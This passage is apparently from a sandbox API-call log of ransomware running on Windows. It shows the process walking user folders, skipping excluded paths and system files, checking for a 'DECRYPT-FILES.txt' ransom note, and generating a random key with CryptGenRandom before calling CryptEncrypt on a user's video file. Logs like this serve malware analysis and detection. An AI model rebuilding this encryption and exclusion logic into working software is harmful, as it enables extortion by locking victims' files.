dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0087.038] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0087.038] CloseHandle (hObject=0x430) returned 1 [0087.038] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0087.038] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0087.038] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0087.038] lstrcatW (in: lpString1="SendTo", lpString2="\\" | out: lpString1="SendTo\\") returned="SendTo\\" [0087.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0087.038] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Program Files") returned 0x0 [0087.038] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch=":\\Windows") returned 0x0 [0087.038] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Games\\") returned 0x0 [0087.038] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.038] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.038] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\All Users") returned 0x0 [0087.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="AhnLab") returned 0x0 [0087.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.039] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned 37 [0087.039] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.039] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\\\jkbimi8.tmp") returned 49 [0087.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.039] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned 37 [0087.039] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.039] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\\\DECRYPT-FILES.txt") returned 55 [0087.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.039] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned 37 [0087.039] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*" [0087.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb012e180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0087.040] CloseHandle (hObject=0x430) returned 1 [0087.040] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0087.040] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0087.040] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0087.040] lstrcatW (in: lpString1="Start Menu", lpString2="\\" | out: lpString1="Start Menu\\") returned="Start Menu\\" [0087.040] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Program Files") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch=":\\Windows") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Games\\") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\All Users") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="AhnLab") returned 0x0 [0087.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.040] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned 41 [0087.040] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.040] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\\\jkbimi8.tmp") returned 53 [0087.040] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.041] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned 41 [0087.041] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.041] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\\\DECRYPT-FILES.txt") returned 59 [0087.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.041] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned 41 [0087.041] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*" [0087.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb012e180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0087.041] CloseHandle (hObject=0x430) returned 1 [0087.041] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0087.041] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0087.041] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0087.041] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0087.041] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0087.041] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Program Files") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch=":\\Windows") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Games\\") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\All Users") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="AhnLab") returned 0x0 [0087.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.042] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned 40 [0087.042] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.042] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\\\jkbimi8.tmp") returned 52 [0087.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.042] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned 40 [0087.042] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.042] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\\\DECRYPT-FILES.txt") returned 58 [0087.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.042] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned 40 [0087.042] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*" [0087.043] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb012e180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0087.043] CloseHandle (hObject=0x430) returned 1 [0087.043] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xae6408a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae6408a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0087.043] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0087.043] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0087.043] lstrcatW (in: lpString1="Videos", lpString2="\\" | out: lpString1="Videos\\") returned="Videos\\" [0087.043] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Program Files") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch=":\\Windows") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Games\\") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\All Users") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="AhnLab") returned 0x0 [0087.043] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.043] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.043] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.043] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\\\jkbimi8.tmp") returned 49 [0087.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.044] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.044] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.044] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\\\DECRYPT-FILES.txt") returned 55 [0087.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.044] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.044] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" [0087.044] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0087.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.044] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.044] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef121510, ftCreationTime.dwHighDateTime=0x1d4cb32, ftLastAccessTime.dwLowDateTime=0x95ae8ce0, ftLastAccessTime.dwHighDateTime=0x1d4c643, ftLastWriteTime.dwLowDateTime=0x95ae8ce0, ftLastWriteTime.dwHighDateTime=0x1d4c643, nFileSizeHigh=0x0, nFileSizeLow=0x676a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0 cG.mkv", cAlternateFileName="0CG~1.MKV")) returned 1 [0087.044] lstrcmpiW (lpString1="0 cG.mkv", lpString2="DECRYPT-FILES.txt") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="autorun.inf") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="boot.ini") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="desktop.ini") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="ntuser.dat") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="iconcache.db") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="bootsect.bak") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="ntuser.dat.log") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="thumbs.db") returned -1 [0087.046] lstrcmpiW (lpString1="0 cG.mkv", lpString2="Bootfont.bin") returned -1 [0087.046] lstrlenW (lpString="0 cG.mkv") returned 8 [0087.046] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0087.046] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0087.046] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0087.046] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0087.046] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.046] lstrlenW (lpString="0 cG.mkv") returned 8 [0087.046] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.046] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="0 cG.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv" [0087.046] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0 cg.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.047] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=26474) returned 1 [0087.047] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.047] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.047] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.047] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.047] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.048] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.048] 